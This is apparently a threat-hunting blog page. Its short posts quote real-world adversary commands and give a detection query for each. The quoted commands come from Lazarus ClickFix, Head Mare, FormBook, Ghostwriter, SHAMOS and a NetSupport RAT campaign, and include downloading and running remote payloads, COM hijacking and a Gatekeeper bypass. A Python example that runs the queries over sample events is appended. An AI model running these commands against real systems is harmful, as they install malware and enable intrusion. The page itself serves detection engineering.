Posts

241. That's How Lazarus Adopted ClickFix and How to Hunt It

Hello everyone! The ClickFix technique is becoming more and more popular and is now part of the arsenal of even state-sponsored adversaries. Today we'll look at how Lazarus (or Lazer Werewolf) leverages this technique, and extract hunting opportunities. So, the adversary used the following command:

curl -k -o "%TEMP%\nvidiaRelease.zip" hXXps://driverservices[.]store/visiodrive/nvidiaRelease.zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\run.vbs"

Here we have at least three hunting opportunities. The first one: using cURL to download a file to a temp folder. I included the arguments used by the threat actors (-k ignores SSL certificate errors; -o specifies the output file path):

event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("k" AND "o" AND "temp"...

240. Adversaries Abuse Enterprise Incident Response Tools

Hello everyone! We already talked about abusing forensic and incident response tools. Let's look at a curious example of how adversaries leverage such software instead of Remote Access Tools (T1219). According to a Sophos report, an adversary leveraged Velociraptor configured to communicate with the C2 server velo[.]qaubctgg[.]workers[.]dev. Yes, you may even use Velociraptor in your environment, but it's unlikely to be configured to communicate with workers[.]dev domains. And we can use this to build the query:

event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "velociraptor.exe"

See you tomorrow!

239. That's How Adversaries Abuse PowerShell for Component Object Model Hijacking

Hello everyone! Do you remember that PowerShell has an almost countless number of procedures? So today we'll look at another one, which involves the following technique: Event Triggered Execution: Component Object Model Hijacking (T1546.015). This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). Once more the adversary leveraged malicious LNK files in order to execute the following PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

238. LOLBAS ITW: Extensible Wizards Host Process

Hello everyone! There're lots of LOLBAS, but are all of them used in the wild? Let's look at how real adversaries abuse Extensible Wizards Host Process for Ingress Tool Transfer (T1105). So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example related to FormBook:

XwIZarD.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe

For example, we can look for xwizard.exe executions with "http" among the command line parameters:

event_type: "processcreatewin" AND proc_file_path: "XwIZarD.exe" AND cmdline: *http*

See you tomorrow!

237. That's How Adversaries Abuse Expand.exe

Hello everyone! In many cases adversaries deobfuscate or decode downloaded or dropped payloads. Of course, they often use LOLBAS for it. So let's look at an example of Deobfuscate/Decode Files or Information (T1140). As always, we need some procedure examples, and we'll extract them from this report on Ghostwriter. Here're a few examples of how the threat actors abuse expand.exe:

"C:\Windows\System32\expand.exe" "C:\Users\<USER>\AppData\Local\Temp\sdw9gobh0n" "C:\Users\<USER>\AppData\Local\Logs\sdw9gobh0n.log"

"%windir%\System32\expand.exe" %ProgramData%\OfficeRuntimeBroker.xlam %ProgramData%\~OfficeRuntimeBroker.dat

Usually it's used with CAB files, so we can search for executions without this file type among the command line arguments:

event_type: "processcreatewin" AND proc_file_path: "expand.exe" AND NOT cmdline: *cab

Tune it based on your own telemetry! For example, you may also need to...

236. That's How SHAMOS Bypasses Gatekeeper Checks

Hello everyone! Let's talk a bit about defense evasion. But not Windows. And not Linux. Today we're going to look at a procedure related to the following technique: Subvert Trust Controls: Gatekeeper Bypass (T1553.001). And we'll look at SHAMOS, a variant of Atomic macOS Stealer (AMOS). To bypass Gatekeeper checks, it clears all extended attributes using xattr:

sudo -S xattr -c /tmp/update

We can hunt for attribute clearing on suspicious files located under /tmp:

event_type: "processcreatemac" AND proc_file_path: "xattr" AND cmdline: ("c" AND "tmp")

See you tomorrow!

235. Adversaries Abuse Msiexec as a Part of ClickFix

Hello everyone! There're lots of legitimate binaries used by threat actors as a part of ClickFix: PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique: System Binary Proxy Execution: Msiexec (T1218.007). This time the adversary abused msiexec to install NetSupport RAT on the compromised system:

msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45

For example, we can look for msiexec running files without an .msi extension from a remote server:

event_type: "processcreatewin" AND proc_file_path: "msiexec.exe" AND cmdline: *http* AND NOT cmdline: *msi*

See you tomorrow!
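The hunting queries quoted in posts 241, 240, 238, 237, 236 and 235 above, re-expressed as Python predicates and run over constructed sample events, as an added example that is not code from the original posts. Field names follow the page's query syntax (event_type, proc_file_path, cmdline, dns_rname); the sample events, paths, GUID and example.invalid URLs are all constructed, and two benign look-alikes are included to show where the page's patterns need tuning.

```python
# Added example, not code from the original posts: the hunting queries of posts
# 241, 240, 238, 237, 236 and 235 expressed as Python predicates and run over
# constructed telemetry events. Field names (event_type, proc_file_path, cmdline,
# dns_rname) follow the page; every event, path and URL below is constructed.
def _proc_is(e, name):  # process-creation event whose image basename is `name`
    base = e.get("proc_file_path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    return e.get("event_type", "").startswith("processcreate") and base == name
def _args(e):  # command-line tokens without the image itself (token 0)
    return e.get("cmdline", "").split()[1:]
def curl_temp_download(e):  # post 241: curl -k (skip cert checks) -o <path> into a temp folder
    a = [t.lower() for t in _args(e)]
    return _proc_is(e, "curl.exe") and "-k" in a and "-o" in a and any("temp" in t for t in a)
def velociraptor_workers_dev(e):  # post 240: velociraptor.exe resolving a workers.dev name
    return (e.get("event_type") == "dnsreqwin"
            and e.get("proc_file_path", "").lower().endswith("velociraptor.exe")
            and e.get("dns_rname", "").lower().endswith("workers.dev"))
def xwizard_http(e):  # post 238: xwizard.exe with a URL among its parameters
    return _proc_is(e, "xwizard.exe") and "http" in e.get("cmdline", "").lower()
def expand_without_cab(e):  # post 237: expand.exe where no argument is a .cab, its normal input
    return _proc_is(e, "expand.exe") and not any(t.lower().endswith(".cab") for t in _args(e))
def xattr_clear_tmp(e):  # post 236 (macOS): xattr -c on a file under /tmp
    a = _args(e)
    return _proc_is(e, "xattr") and "-c" in a and any(t.startswith("/tmp/") for t in a)
def msiexec_remote_non_msi(e):  # post 235: msiexec installing a non-.msi from a URL
    # The page's "NOT cmdline: *msi*" would also match the image name msiexec itself,
    # so only the arguments are tested for an .msi target here.
    a = [t.lower() for t in _args(e)]
    return (_proc_is(e, "msiexec.exe") and any(t.startswith("http") for t in a)
            and not any(".msi" in t for t in a))

RULES = [curl_temp_download, velociraptor_workers_dev, xwizard_http,
         expand_without_cab, xattr_clear_tmp, msiexec_remote_non_msi]
def hunt(events):  # -> [(rule name, event index)] for every rule each event triggers
    return [(r.__name__, i) for i, e in enumerate(events) for r in RULES if r(e)]

def ev(event_type, proc_file_path, **fields):  # builds one constructed sample event
    return {"event_type": event_type, "proc_file_path": proc_file_path, **fields}
W, P = "C:\\Windows\\System32\\", "processcreatewin"
EVENTS = [  # constructed sample telemetry; events 4 and 7 are benign look-alikes
    ev(P, W + "curl.exe", cmdline='curl -k -o "%TEMP%\\pkg.zip" https://example.invalid/pkg.zip'),
    ev("dnsreqwin", "C:\\Tools\\velociraptor.exe", dns_rname="sample.workers.dev"),
    ev(P, W + "xwizard.exe", cmdline="xwizard.exe RunWizard {00000000-0000-0000-0000-000000000000} /z https://example.invalid/a.exe"),
    ev(P, W + "expand.exe", cmdline="expand.exe C:\\Users\\u\\AppData\\Local\\Temp\\blob C:\\Users\\u\\AppData\\Local\\Logs\\blob.log"),
    ev(P, W + "expand.exe", cmdline="expand.exe C:\\drv\\pkg.cab -F:* C:\\drv"),
    ev("processcreatemac", "/usr/bin/xattr", cmdline="xattr -c /tmp/update"),
    ev(P, W + "msiexec.exe", cmdline="msiexec /i https://example.invalid/res/blob /qn"),
    ev(P, W + "msiexec.exe", cmdline="msiexec /i https://example.invalid/setup.msi /qn"),
]
```

Calling hunt(EVENTS) returns one (rule, index) pair for events 0, 1, 2, 3, 5 and 6; the legitimate CAB expansion and the real .msi install stay silent.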